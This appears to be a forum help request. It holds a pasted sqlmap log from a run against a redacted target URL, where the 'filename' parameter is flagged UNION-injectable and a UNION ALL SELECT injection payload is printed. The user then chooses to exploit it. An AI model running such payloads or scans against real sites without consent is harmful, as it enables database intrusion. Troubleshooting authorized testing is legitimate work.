Hi,
Below is the sqlmap command. The next time I ran it, it already said that the
parameter filename is not injectable. However, I always get an info message that
the target URL is UNION injectable, but the number of columns changes every
session. I also used --technique=U --dbms=mysql --flush-session --level=3
--risk=3 and even --time-sec=2, but I only get the UNION injectable message and
nothing is vulnerable. What seems to be the problem here? Can anybody help me?

C:\Python27\sqlmap>python sqlmap.py -u "xxxxxxx" --forms --batch --beep
sqlmap/1.0-dev (r4221) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 14:39:37
[14:39:37] [INFO] setting file for logging HTTP traffic
[14:39:37] [INFO] testing connection to the target url
[14:39:38] [INFO] searching for forms
[#1] form: [INFO]
GET xxxxxxxxx
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: xxxxxxxx
do you want to fill blank fields with random values? [Y/n] Y
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\xxxx\session' as session file
[14:39:38] [INFO] using 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv' as results file
[14:39:38] [INFO] testing if the url is stable, wait a few seconds
[14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
[14:39:39] [WARNING] GET parameter 'productid' appears to be not dynamic
[14:39:39] [WARNING] heuristic test shows that GET parameter 'productid' might not be injectable
[14:39:39] [INFO] testing sql injection on GET parameter 'productid'
[14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:41] [INFO] testing 'Oracle AND time-based blind'
[14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:42] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. you can try to explicitly set it using the --dbms option
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:44] [INFO] testing if GET parameter 'name' is dynamic
[14:39:44] [WARNING] GET parameter 'name' appears to be not dynamic
[14:39:44] [WARNING] heuristic test shows that GET parameter 'name' might not be injectable
[14:39:44] [INFO] testing sql injection on GET parameter 'name'
[14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:46] [INFO] testing 'Oracle AND time-based blind'
[14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:47] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:39:50] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:51] [WARNING] GET parameter 'name' is not injectable
[14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
[14:39:52] [WARNING] GET parameter 'filename' appears to be not dynamic
[14:39:52] [WARNING] heuristic test shows that GET parameter 'filename' might not be injectable
[14:39:52] [INFO] testing sql injection on GET parameter 'filename'
[14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:39:52] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:53] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:39:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't recovered yet from previous timed based payload. if the problem persists please wait for few minutes and rerun without flag T in --technique option (e.g. --flush-session --technique=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:39:56] [INFO] testing 'Oracle AND time-based blind'
[14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:39:57] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[14:40:00] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:03] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:04] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:05] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:07] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:08] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:09] [INFO] target url appears to be UNION injectable with 10 columns
[14:40:09] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:12] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:13] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [INFO] GET parameter 'filename' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'filename' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 414 HTTP(s) requests:
---
Place: GET
Parameter: filename
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 to 10 columns
    Payload: productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsDiekxuxW', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND 'Aege'='Aege&creationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isactive=on&comment=uPni
---
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy, skipping to the next form
[14:40:16] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
[*] shutting down at 14:40:16